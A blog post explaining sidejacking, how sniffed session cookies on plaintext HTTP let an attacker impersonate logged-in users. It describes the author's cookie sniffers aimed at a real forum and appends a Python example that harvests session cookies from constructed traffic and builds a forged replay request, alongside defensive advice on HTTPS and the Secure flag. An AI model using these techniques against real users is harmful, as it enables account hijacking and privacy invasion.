Monday, February 1, 2010

Stealing cookies to impersonate web-users and hijack user accounts (Sidejacking)

This post is more on the theory behind such an attack and why it works. I blogged about tools called Ferret and Hamster in the past which can be used to demonstrate this attack. When I first saw the awesomeness of such a tool, a line was drawn between me having the understanding of what was really going on and being a script kiddie. I knew how the attack works and why it works, but it was never something I could've accomplished on my own. That is no longer the case :)

The idea behind the sidejacking attack is to impersonate a user via their cookies and session IDs. A session ID is the token a web server hands out after login so it can recognise the same client on later requests, and it is usually stored in a cookie; the browser then attaches that cookie to every request for the domain. The server does not re-check the password on each request, it only checks the cookie, so whoever presents the cookie is treated as the logged-in user. For example, say you log on to Gmail and exit the browser session without signing off. The next time you open your browser and navigate to the Gmail sign-on page, you will notice that you are automatically signed in. This is because the cookies and session ID stored in your browser are still valid and are being used to authenticate you to Gmail's servers.

This attack isn't very difficult using tools like Ferret and Hamster that are already out there, but sometimes things don't work like they should. I've encountered such problems and decided to dig deeper into this and see how I can do this attack without using such tools, and maybe I can understand why they work sometimes and fail other times. The difficulty in writing such a program is in figuring out which cookies to clone. In my research I also found that only the content field in the cookie might be used to authenticate the user, and not so much the expiration date and time fields. That is expected: Expires, Path and the other attributes in a Set-Cookie header are instructions to the browser about when and where to send the cookie, and only the name=value pairs travel back to the server in the Cookie header, so a replayed name=value pair is all the server ever sees. I haven't tested on many sites, but I tested on one of my favorite music discussion forums, www.boxden.com.

I wrote a few Perl sniffers, including one specifically tailored to the boxden.com domain that extracts the cookie information in an easy-to-read format. When the sniffer sees the necessary cookies from this domain, including the session and userid cookie information, it pulls them out and dumps them to standard output (screen). I can then quickly use a Firefox extension to manually edit or add cookie information as necessary. After insertion of the required cookies, I can then navigate to the domain (in this example, www.boxden.com) and, with some good luck, you would now be impersonating someone's user account. You would now be able to read their messages, edit some of their personal information, etc. It's for this reason users should be more conscious, not only when using public internet hotspots, but at work and at home as well, since anyone on the same network segment who can see your plaintext HTTP traffic can copy the cookie. Remembering to log out of all your web sessions helps because a well-behaved server invalidates the session ID on logout, so a captured cookie stops working; until then the attacker can use it for as long as the session stays valid. The fix that removes the sniffing opportunity altogether is on the site's side: serve the whole session over HTTPS and set the Secure flag on the session cookie so the browser never sends it in the clear.
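The sniff-and-replay procedure above, as an added Python example rather than the author's Perl sniffers: it takes raw plaintext HTTP messages (a constructed capture standing in for what a packet sniffer would hand it), pulls the session cookies for one host out of the client's Cookie header, builds the replay request an attacker's browser would send, and shows why the server-side attributes never matter: the Set-Cookie response carries Expires and Path, but the browser's later request carries only name=value. The host www.example.com, the cookie names sessionid and userid, and every value are assumptions for illustration, not real site traffic. It also lists cookies set without the Secure attribute, which is what lets them be sniffed from plain HTTP in the first place.

```python
"""Sidejacking illustration: extract session cookies from captured plaintext
HTTP and build the replay request.  Added example; not the author's sniffers.
The host, cookie names and values below are constructed for illustration."""
from http.cookies import SimpleCookie

TARGET_HOST = "www.example.com"          # assumed target
SESSION_COOKIES = ("sessionid", "userid")  # assumed names of the cookies that matter

# Constructed capture: what a sniffer on the same network would hand us.
CAPTURED = [
    # Server response that creates the session.  Expires/Path/Secure are
    # browser-side attributes: they tell the browser when and where to send
    # the cookie, but they are never sent back to the server.
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: sessionid=3f9c1d2e7a; expires=Wed, 03 Feb 2010 00:00:00 GMT; path=/\r\n"
    b"Set-Cookie: userid=12345; path=/\r\n"
    b"Content-Length: 0\r\n\r\n",
    # A later request from the logged-in browser: only name=value pairs travel.
    b"GET /forum/ HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Cookie: sessionid=3f9c1d2e7a; userid=12345; style=dark\r\n\r\n",
    # Unrelated traffic to another host that must be ignored.
    b"GET / HTTP/1.1\r\n"
    b"Host: other.example.net\r\n"
    b"Cookie: sessionid=deadbeef\r\n\r\n",
]


def split_headers(msg: bytes):
    """Return (start line, [(lowercased name, value), ...]) for one raw HTTP message."""
    head = msg.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first colon only; values may contain ':'
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def set_cookie_attributes(response: bytes) -> dict:
    """Map each cookie the server sets to its non-empty attributes (expires, path, secure...)."""
    out = {}
    for name, value in split_headers(response)[1]:
        if name == "set-cookie":
            jar = SimpleCookie()
            jar.load(value)
            for cname, morsel in jar.items():
                out[cname] = {k: v for k, v in morsel.items() if v}
    return out


def request_cookies(request: bytes):
    """Return (host, {cookie name: value}) for a captured client request.
    This is all a server ever receives: no expiry, no flags."""
    host, cookies = None, {}
    for name, value in split_headers(request)[1]:
        if name == "host":
            host = value.lower()
        elif name == "cookie":
            jar = SimpleCookie()
            jar.load(value)
            cookies.update({c: m.value for c, m in jar.items()})
    return host, cookies


def harvest(captured, target_host, wanted):
    """The sniffer's job: pull the wanted cookies out of requests to target_host."""
    found = {}
    for msg in captured:
        if msg.startswith(b"HTTP/"):            # server response, not a client request
            continue
        host, cookies = request_cookies(msg)
        if host == target_host:
            found.update({k: v for k, v in cookies.items() if k in wanted})
    return found


def build_replay(host, path, cookies) -> bytes:
    """The request the attacker's browser sends once the stolen cookies are
    pasted in: the same name=value pairs, nothing else is needed."""
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_hdr}\r\nConnection: close\r\n\r\n").encode()


def unprotected_cookies(response: bytes):
    """Cookies set without the Secure flag: the browser will send these over
    plain HTTP, which is what makes them sniffable."""
    return sorted(n for n, attrs in set_cookie_attributes(response).items()
                  if not attrs.get("secure"))


if __name__ == "__main__":
    stolen = harvest(CAPTURED, TARGET_HOST, SESSION_COOKIES)
    print("stolen:", stolen)
    print(build_replay(TARGET_HOST, "/forum/", stolen).decode())
    print("sent in the clear:", unprotected_cookies(CAPTURED[0]))
```

Running it prints the two harvested cookies, the forged GET carrying only `sessionid=...; userid=...`, and the list of cookies the site set without Secure. The `style` cookie is dropped on purpose: the sniffer only needs the pair that identifies the session, which is exactly the "which cookies to clone" decision the post describes.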
